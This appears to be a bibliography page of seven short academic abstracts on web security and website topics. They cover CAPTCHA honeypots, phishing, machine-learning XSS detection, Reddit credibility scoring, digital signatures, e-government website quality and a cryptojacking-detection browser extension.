Biblio
The resistance to attacks aimed to break CAPTCHA challenges and the effectiveness, efficiency and satisfaction of human users in solving them called usability are the two major concerns while designing CAPTCHA schemes. User-friendliness, universality, and accessibility are related dimensions of usability, which must also be addressed adequately. With recent advances in segmentation and optical character recognition techniques, complex distortions, degradations and transformations are added to text-based CAPTCHA challenges resulting in their reduced usability. The extent of these deformations can be decreased if some additional security mechanism is incorporated in such challenges. This paper proposes an additional security mechanism that can add an extra layer of protection to any text-based CAPTCHA challenge, making it more challenging for bots and scripts that might be used to attack websites and web applications. It proposes the use of hidden text-boxes for user entry of CAPTCHA string which serves as honeypots for bots and automated scripts. The honeypot technique is used to trick bots and automated scripts into filling up input fields which legitimate human users cannot fill in. The paper reports implementation of honeypot technique and results of tests carried out over three months during which form submissions were logged for analysis. The results demonstrated great effectiveness of honeypots technique to improve security control and usability of text-based CAPTCHA challenges.
Internet is the most widely used technology in the current era of information technology and it is embedded in daily life activities. Due to its extensive use in everyday life, it has many applications such as social media (Face book, WhatsApp, messenger etc.,) and other online applications such as online businesses, e-counseling, advertisement on websites, e-banking, e-hunting websites, e-doctor appointment and e-doctor opinion. The above mentioned applications of internet technology makes things very easy and accessible for human being in limited time, however, this technology is vulnerable to various security threats. A vital and severe threat associated with this technology or a particular application is “Phishing attack” which is used by attacker to usurp the network security. Phishing attacks includes fake E-mails, fake websites, fake applications which are used to steal their credentials or usurp their security. In this paper, a detailed overview of various phishing attacks, specifically their background knowledge, and solutions proposed in literature to address these issues using various techniques such as anti-phishing, honey pots and firewalls etc. Moreover, installation of intrusion detection systems (IDS) and intrusion detection and prevention system (IPS) in the networks to allow the authentic traffic in an operational network. In this work, we have conducted end use awareness campaign to educate and train the employs in order to minimize the occurrence probability of these attacks. The result analysis observed for this survey was quite excellent by means of its effectiveness to address the aforementioned issues.
Cross-Site Scripting (XSS) is an attack most often carried out by attackers to attack a website by inserting malicious scripts into a website. This attack will take the user to a webpage that has been specifically designed to retrieve user sessions and cookies. Nearly 68% of websites are vulnerable to XSS attacks. In this study, the authors conducted a study by evaluating several machine learning methods, namely Support Vector Machine (SVM), K-Nearest Neighbour (KNN), and Naïve Bayes (NB). The machine learning algorithm is then equipped with the n-gram method to each script feature to improve the detection performance of XSS attacks. The simulation results show that the SVM and n-gram method achieves the highest accuracy with 98%.
As AI systems become more ubiquitous, securing them becomes an emerging challenge. Over the years, with the surge in online social media use and the data available for analysis, AI systems have been built to extract, represent and use this information. The credibility of this information extracted from open sources, however, can often be questionable. Malicious or incorrect information can cause a loss of money, reputation, and resources; and in certain situations, pose a threat to human life. In this paper, we use an ensembled semi-supervised approach to determine the credibility of Reddit posts by estimating their reputation score to ensure the validity of information ingested by AI systems. We demonstrate our approach in the cybersecurity domain, where security analysts utilize these systems to determine possible threats by analyzing the data scattered on social media websites, forums, blogs, etc.
This paper presents a case study on the use and implementation of the Qualified Digital Signature. Problematics such as the degree of use, security and authenticity of Qualified Digital Signature and the publication and dissemination of documents signed in digital format are analyzed. In order to support the case study, a methodology was adopted that included interviews with municipalities that are part of the Intermunicipal Community of the region of Leiria and a computer application was developed that allowed to analyze the documents available in the institutional websites of the municipalities, the ones that were digitally signed. The results show that institutional websites are already providing documentation with Qualified Digital Signature and that the level of trust and authenticity regarding their use is considered to be mostly very positive.
With the development of new technologies in the world, governments have tendency to make a communications with people and business with the help of such technologies. Electronic government (e-government) is defined as utilizing information technologies such as electronic networks, Internet and mobile phones by organizations and state institutions in order to making wide communication between citizens, business and different state institutions. Development of e-government starts with making website in order to share information with users and is considered as the main infrastructure for further development. Website assessment is considered as a way for improving service quality. Different international researches have introduced various indexes for website assessment, they only see some dimensions of website in their research. In this paper, the most important indexes for website quality assessment based on accurate review of previous studies are "Web design", "navigation", services", "maintenance and Support", "Citizens Participation", "Information Quality", "Privacy and Security", "Responsiveness", "Usability". Considering mentioned indexes in designing the website facilitates user interaction with the e-government websites.
Cryptojacking (also called malicious cryptocurrency mining or cryptomining) is a new threat model using CPU resources covertly “mining” a cryptocurrency in the browser. The impact is a surge in CPU Usage and slows the system performance. In this research, in-browsercryptojacking mitigation has been built as an extension in Google Chrome using Taint analysis method. The method used in this research is attack modeling with abuse case using the Man-In-The-Middle (MITM) attack as a testing for mitigation. The proposed model is designed so that users will be notified if a cryptojacking attack occurs. Hence, the user is able to check the script characteristics that run on the website background. The results of this research show that the taint analysis is a promising method to mitigate cryptojacking attacks. From 100 random sample websites, the taint analysis method can detect 19 websites that are infcted by cryptojacking.